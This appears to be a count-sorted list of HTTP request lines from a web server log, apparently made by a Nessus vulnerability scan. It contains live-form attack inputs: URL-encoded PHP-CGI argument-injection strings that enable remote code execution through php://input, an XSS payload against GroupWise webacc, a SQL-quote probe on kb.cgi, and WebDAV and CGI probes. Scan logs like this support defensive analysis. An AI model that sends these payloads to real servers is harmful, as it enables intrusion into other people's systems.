1 POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
1 POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
1 POST /cgi-bin/samba/smbshr.pl HTTP/1.1
1 POST /cgi-bin/smbshr.pl HTTP/1.1
1 POST /cgi-binvendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
1 POST /db/o7LCQt3q.htm HTTP/1.1
1 POST /file/SSiqsE8j.htm HTTP/1.1
1 POST /flex2gateway/http HTTP/1.1
1 POST /formmail.pl HTTP/1.0
1 POST /formmail HTTP/1.0
1 POST /functionRouter HTTP/1.1
1 POST /getpassword.php HTTP/1.1
1 POST /glpi/vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
1 POST /gw/webacc?User.interface=/../webacc/hdml&User.id=\"><img/src=\"1717627954\"/onerror=javascript:alert(/groupwise_webaccess_userinterface_xss.nasl/\")> HTTP/1.1
1 POST /gw/webacc?User.interface=/../webacc/hdml HTTP/1.1
1 POST /icons/u1quIJcl.htm HTTP/1.1
1 POST /images/pTcJweRJ.htm HTTP/1.1
1 POST /index.php?-d+allow_url_include%3don+-d+safe_mode%3doff+-d+suhosin[.]simulation%3don+-d+open_basedir%3doff+-d+auto_prepend_file%3dphp%3a//input+-n HTTP/1.1
1 POST /index.php?s=xxxx HTTP/1.1
4 POST /index.php HTTP/1.1
1 POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
1 POST /jsonrpc HTTP/1.1
1 POST /kb.cgi?view='&lang=en HTTP/1.1
1 POST /lcds-samples/messagebroker/http HTTP/1.1
1 POST /lcds/messagebroker/http HTTP/1.1
1 POST /login.php HTTP/1.1
1 POST /manager/jmrwHjG5.htm HTTP/1.1
1 POST /messagebroker/http HTTP/1.1
1 POST /mysql/k37dAoEg.htm HTTP/1.1
1 POST /perl/ HTTP/1.1
1 POST /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 POST /pma/gSyfwTnT.htm HTTP/1.1
2 POST /samba/smbshr.pl HTTP/1.1
1 POST /samples/messagebroker/http HTTP/1.1
1 POST /sawmill6cl.exe HTTP/1.1
1 POST /sawmillcl.exe HTTP/1.1
1 POST /scripts/EucalyptusWebBackend HTTP/1.1
1 POST /scripts/formmail.pl HTTP/1.0
1 POST /scripts/formmail HTTP/1.0
1 POST /scripts/getpassword.php HTTP/1.1
3 POST /scripts/index.php HTTP/1.1
1 POST /scripts/kb.cgi?view='&lang=en HTTP/1.1
1 POST /scripts/login.php HTTP/1.1
1 POST /scripts/samba/smbshr.pl HTTP/1.1
1 POST /scripts/smbshr.pl HTTP/1.1
1 POST /scriptsvendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
1 POST /server/service/smsConfigServiceHttpInvoker HTTP/1.1
7 POST /servlet/GetProductVersion HTTP/1.1
1 POST /servlet/webacc?User.interface=/../webacc/hdml&User.id=\"><img/src=\"1717627954\"/onerror=javascript:alert(/groupwise_webaccess_userinterface_xss.nasl/\")> HTTP/1.1
1 POST /servlet/webacc?User.interface=/../webacc/hdml HTTP/1.1
1 POST /smbshr.pl HTTP/1.1
1 POST /something/maybe/ping HTTP/1.1
1 POST /spipe?Source=nessus HTTP/1.0
1 POST /topic HTTP/1.1
1 POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
1 POST /webui/apps/sdcss HTTP/1.1
1 POST http[:]//127[.]0[.]0[.]1/iControl/iControlPortal.cgi HTTP/1.1
1 POST vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
5 PRI * HTTP/2.0
1 PROPFIND / HTTP/1.1
1 PROPFIND /admin/4ghjig3F.htm HTTP/1.1
1 PROPFIND /administrator/PE5p3rXa.htm HTTP/1.1
1 PROPFIND /bYvTnJuH.htm HTTP/1.1
1 PROPFIND /cgi-bin/8nWK_13r.htm HTTP/1.1
1 PROPFIND /db/o7LCQt3q.htm HTTP/1.1
1 PROPFIND /file/SSiqsE8j.htm HTTP/1.1
1 PROPFIND /icons/u1quIJcl.htm HTTP/1.1
1 PROPFIND /images/pTcJweRJ.htm HTTP/1.1
1 PROPFIND /manager/jmrwHjG5.htm HTTP/1.1
1 PROPFIND /mysql/k37dAoEg.htm HTTP/1.1
1 PROPFIND /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 PROPFIND /pma/gSyfwTnT.htm HTTP/1.1
1 PROPPATCH /admin/4ghjig3F.htm HTTP/1.1
1 PROPPATCH /administrator/PE5p3rXa.htm HTTP/1.1
1 PROPPATCH /bYvTnJuH.htm HTTP/1.1
1 PROPPATCH /cgi-bin/8nWK_13r.htm HTTP/1.1
1 PROPPATCH /db/o7LCQt3q.htm HTTP/1.1
1 PROPPATCH /file/SSiqsE8j.htm HTTP/1.1
1 PROPPATCH /icons/u1quIJcl.htm HTTP/1.1
1 PROPPATCH /images/pTcJweRJ.htm HTTP/1.1
1 PROPPATCH /manager/jmrwHjG5.htm HTTP/1.1
1 PROPPATCH /mysql/k37dAoEg.htm HTTP/1.1
1 PROPPATCH /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 PROPPATCH /pma/gSyfwTnT.htm HTTP/1.1
1 PUT /FUSncoWjzimH HTTP/1.1
1 PUT /admin/4ghjig3F.htm HTTP/1.1
1 PUT /administrator/PE5p3rXa.htm HTTP/1.1
1 PUT /bYvTnJuH.htm HTTP/1.1
1 PUT /cgi-bin/8nWK_13r.htm HTTP/1.1
1 PUT /db/o7LCQt3q.htm HTTP/1.1
1 PUT /file/SSiqsE8j.htm HTTP/1.1
1 PUT /icons/u1quIJcl.htm HTTP/1.1
1 PUT /images/pTcJweRJ.htm HTTP/1.1
1 PUT /manager/jmrwHjG5.htm HTTP/1.1
1 PUT /mysql/k37dAoEg.htm HTTP/1.1
1 PUT /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 PUT /pma/gSyfwTnT.htm HTTP/1.1
1 REPORT /admin/4ghjig3F.htm HTTP/1.1
1 REPORT /administrator/PE5p3rXa.htm HTTP/1.1
1 REPORT /bYvTnJuH.htm HTTP/1.1
1 REPORT /cgi-bin/8nWK_13r.htm HTTP/1.1
1 REPORT /db/o7LCQt3q.htm HTTP/1.1
1 REPORT /file/SSiqsE8j.htm HTTP/1.1
1 REPORT /icons/u1quIJcl.htm HTTP/1.1
1 REPORT /images/pTcJweRJ.htm HTTP/1.1
1 REPORT /manager/jmrwHjG5.htm HTTP/1.1
1 REPORT /mysql/k37dAoEg.htm HTTP/1.1
1 REPORT /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 REPORT /pma/gSyfwTnT.htm HTTP/1.1
1 RPC_IN_DATA /admin/4ghjig3F.htm HTTP/1.1
1 RPC_IN_DATA /administrator/PE5p3rXa.htm HTTP/1.1
1 RPC_IN_DATA /bYvTnJuH.htm HTTP/1.1
1 RPC_IN_DATA /cgi-bin/8nWK_13r.htm HTTP/1.1
1 RPC_IN_DATA /db/o7LCQt3q.htm HTTP/1.1
1 RPC_IN_DATA /file/SSiqsE8j.htm HTTP/1.1
1 RPC_IN_DATA /icons/u1quIJcl.htm HTTP/1.1
1 RPC_IN_DATA /images/pTcJweRJ.htm HTTP/1.1
1 RPC_IN_DATA /manager/jmrwHjG5.htm HTTP/1.1
1 RPC_IN_DATA /mysql/k37dAoEg.htm HTTP/1.1
1 RPC_IN_DATA /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 RPC_IN_DATA /pma/gSyfwTnT.htm HTTP/1.1
1 RPC_OUT_DATA /admin/4ghjig3F.htm HTTP/1.1
1 RPC_OUT_DATA /administrator/PE5p3rXa.htm HTTP/1.1
1 RPC_OUT_DATA /bYvTnJuH.htm HTTP/1.1
1 RPC_OUT_DATA /cgi-bin/8nWK_13r.htm HTTP/1.1
1 RPC_OUT_DATA /db/o7LCQt3q.htm HTTP/1.1
1 RPC_OUT_DATA /file/SSiqsE8j.htm HTTP/1.1
1 RPC_OUT_DATA /icons/u1quIJcl.htm HTTP/1.1
1 RPC_OUT_DATA /images/pTcJweRJ.htm HTTP/1.1
1 RPC_OUT_DATA /manager/jmrwHjG5.htm HTTP/1.1
1 RPC_OUT_DATA /mysql/k37dAoEg.htm HTTP/1.1
1 RPC_OUT_DATA /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 RPC_OUT_DATA /pma/gSyfwTnT.htm HTTP/1.1
1 SEARCH / HTTP/1.1
1 SEARCH /admin/4ghjig3F.htm HTTP/1.1
1 SEARCH /administrator/PE5p3rXa.htm HTTP/1.1
1 SEARCH /bYvTnJuH.htm HTTP/1.1
1 SEARCH /cgi-bin/8nWK_13r.htm HTTP/1.1
1 SEARCH /db/o7LCQt3q.htm HTTP/1.1
1 SEARCH /file/SSiqsE8j.htm HTTP/1.1
1 SEARCH /icons/u1quIJcl.htm HTTP/1.1
1 SEARCH /images/pTcJweRJ.htm HTTP/1.1
1 SEARCH /manager/jmrwHjG5.htm HTTP/1.1
1 SEARCH /mysql/k37dAoEg.htm HTTP/1.1
1 SEARCH /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 SEARCH /pma/gSyfwTnT.htm HTTP/1.1
1 SUBSCRIBE /admin/4ghjig3F.htm HTTP/1.1
1 SUBSCRIBE /administrator/PE5p3rXa.htm HTTP/1.1
1 SUBSCRIBE /bYvTnJuH.htm HTTP/1.1
1 SUBSCRIBE /cgi-bin/8nWK_13r.htm HTTP/1.1
1 SUBSCRIBE /db/o7LCQt3q.htm HTTP/1.1
1 SUBSCRIBE /file/SSiqsE8j.htm HTTP/1.1
1 SUBSCRIBE /icons/u1quIJcl.htm HTTP/1.1
1 SUBSCRIBE /images/pTcJweRJ.htm HTTP/1.1
1 SUBSCRIBE /manager/jmrwHjG5.htm HTTP/1.1
1 SUBSCRIBE /mysql/k37dAoEg.htm HTTP/1.1
1 SUBSCRIBE /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 SUBSCRIBE /pma/gSyfwTnT.htm HTTP/1.1
1 Secure * Secure-HTTP/1.4
1 TESTZZZ /admin/4ghjig3F.htm HTTP/1.1
1 TESTZZZ /administrator/PE5p3rXa.htm HTTP/1.1
1 TESTZZZ /bYvTnJuH.htm HTTP/1.1
1 TESTZZZ /cgi-bin/8nWK_13r.htm HTTP/1.1
1 TESTZZZ /db/o7LCQt3q.htm HTTP/1.1
1 TESTZZZ /file/SSiqsE8j.htm HTTP/1.1
1 TESTZZZ /icons/u1quIJcl.htm HTTP/1.1
1 TESTZZZ /images/pTcJweRJ.htm HTTP/1.1
1 TESTZZZ /manager/jmrwHjG5.htm HTTP/1.1
1 TESTZZZ /mysql/k37dAoEg.htm HTTP/1.1
1 TESTZZZ /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 TESTZZZ /pma/gSyfwTnT.htm HTTP/1.1
1 TRACE /Nessus1933427993.html HTTP/1.1
1 TRACE /admin/4ghjig3F.htm HTTP/1.1
1 TRACE /administrator/PE5p3rXa.htm HTTP/1.1
1 TRACE /bYvTnJuH.htm HTTP/1.1
1 TRACE /cgi-bin/8nWK_13r.htm HTTP/1.1
1 TRACE /db/o7LCQt3q.htm HTTP/1.1
1 TRACE /file/SSiqsE8j.htm HTTP/1.1
1 TRACE /icons/u1quIJcl.htm HTTP/1.1
1 TRACE /images/pTcJweRJ.htm HTTP/1.1
1 TRACE /manager/jmrwHjG5.htm HTTP/1.1
1 TRACE /mysql/k37dAoEg.htm HTTP/1.1
1 TRACE /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 TRACE /pma/gSyfwTnT.htm HTTP/1.1
1 UNCHECKOUT /admin/4ghjig3F.htm HTTP/1.1
1 UNCHECKOUT /administrator/PE5p3rXa.htm HTTP/1.1
1 UNCHECKOUT /bYvTnJuH.htm HTTP/1.1
1 UNCHECKOUT /cgi-bin/8nWK_13r.htm HTTP/1.1
1 UNCHECKOUT /db/o7LCQt3q.htm HTTP/1.1
1 UNCHECKOUT /file/SSiqsE8j.htm HTTP/1.1
1 UNCHECKOUT /icons/u1quIJcl.htm HTTP/1.1
1 UNCHECKOUT /images/pTcJweRJ.htm HTTP/1.1
1 UNCHECKOUT /manager/jmrwHjG5.htm HTTP/1.1
1 UNCHECKOUT /mysql/k37dAoEg.htm HTTP/1.1
1 UNCHECKOUT /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 UNCHECKOUT /pma/gSyfwTnT.htm HTTP/1.1
1 UNLOCK /admin/4ghjig3F.htm HTTP/1.1
1 UNLOCK /administrator/PE5p3rXa.htm HTTP/1.1
1 UNLOCK /bYvTnJuH.htm HTTP/1.1
1 UNLOCK /cgi-bin/8nWK_13r.htm HTTP/1.1
1 UNLOCK /db/o7LCQt3q.htm HTTP/1.1
1 UNLOCK /file/SSiqsE8j.htm HTTP/1.1
1 UNLOCK /icons/u1quIJcl.htm HTTP/1.1
1 UNLOCK /images/pTcJweRJ.htm HTTP/1.1
1 UNLOCK /manager/jmrwHjG5.htm HTTP/1.1
1 UNLOCK /mysql/k37dAoEg.htm HTTP/1.1
1 UNLOCK /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 UNLOCK /pma/gSyfwTnT.htm HTTP/1.1
1 UNSUBSCRIBE /admin/4ghjig3F.htm HTTP/1.1
1 UNSUBSCRIBE /administrator/PE5p3rXa.htm HTTP/1.1
1 UNSUBSCRIBE /bYvTnJuH.htm HTTP/1.1
1 UNSUBSCRIBE /cgi-bin/8nWK_13r.htm HTTP/1.1
1 UNSUBSCRIBE /db/o7LCQt3q.htm HTTP/1.1
1 UNSUBSCRIBE /file/SSiqsE8j.htm HTTP/1.1
1 UNSUBSCRIBE /icons/u1quIJcl.htm HTTP/1.1
1 UNSUBSCRIBE /images/pTcJweRJ.htm HTTP/1.1
1 UNSUBSCRIBE /manager/jmrwHjG5.htm HTTP/1.1
1 UNSUBSCRIBE /mysql/k37dAoEg.htm HTTP/1.1
1 UNSUBSCRIBE /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 UNSUBSCRIBE /pma/gSyfwTnT.htm HTTP/1.1
1 UPDATE /admin/4ghjig3F.htm HTTP/1.1
1 UPDATE /administrator/PE5p3rXa.htm HTTP/1.1
1 UPDATE /bYvTnJuH.htm HTTP/1.1
1 UPDATE /cgi-bin/8nWK_13r.htm HTTP/1.1
1 UPDATE /db/o7LCQt3q.htm HTTP/1.1
1 UPDATE /file/SSiqsE8j.htm HTTP/1.1
1 UPDATE /icons/u1quIJcl.htm HTTP/1.1
1 UPDATE /images/pTcJweRJ.htm HTTP/1.1
1 UPDATE /manager/jmrwHjG5.htm HTTP/1.1
1 UPDATE /mysql/k37dAoEg.htm HTTP/1.1
1 UPDATE /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 UPDATE /pma/gSyfwTnT.htm HTTP/1.1
1 VERSION-CONTROL /admin/4ghjig3F.htm HTTP/1.1
1 VERSION-CONTROL /administrator/PE5p3rXa.htm HTTP/1.1
1 VERSION-CONTROL /bYvTnJuH.htm HTTP/1.1
1 VERSION-CONTROL /cgi-bin/8nWK_13r.htm HTTP/1.1
1 VERSION-CONTROL /db/o7LCQt3q.htm HTTP/1.1
1 VERSION-CONTROL /file/SSiqsE8j.htm HTTP/1.1
1 VERSION-CONTROL /icons/u1quIJcl.htm HTTP/1.1
1 VERSION-CONTROL /images/pTcJweRJ.htm HTTP/1.1
1 VERSION-CONTROL /manager/jmrwHjG5.htm HTTP/1.1
1 VERSION-CONTROL /mysql/k37dAoEg.htm HTTP/1.1
1 VERSION-CONTROL /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 VERSION-CONTROL /pma/gSyfwTnT.htm HTTP/1.1
1 X-MS-ENUMATTS /admin/4ghjig3F.htm HTTP/1.1
1 X-MS-ENUMATTS /administrator/PE5p3rXa.htm HTTP/1.1
1 X-MS-ENUMATTS /bYvTnJuH.htm HTTP/1.1
1 X-MS-ENUMATTS /cgi-bin/8nWK_13r.htm HTTP/1.1
1 X-MS-ENUMATTS /db/o7LCQt3q.htm HTTP/1.1
1 X-MS-ENUMATTS /file/SSiqsE8j.htm HTTP/1.1
1 X-MS-ENUMATTS /icons/u1quIJcl.htm HTTP/1.1
1 X-MS-ENUMATTS /images/pTcJweRJ.htm HTTP/1.1
1 X-MS-ENUMATTS /manager/jmrwHjG5.htm HTTP/1.1
1 X-MS-ENUMATTS /mysql/k37dAoEg.htm HTTP/1.1
1 X-MS-ENUMATTS /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 X-MS-ENUMATTS /pma/gSyfwTnT.htm HTTP/1.1
1 XYDNDH / HTTP/1.1
1 some invalid request
1 t3 12.2.1\n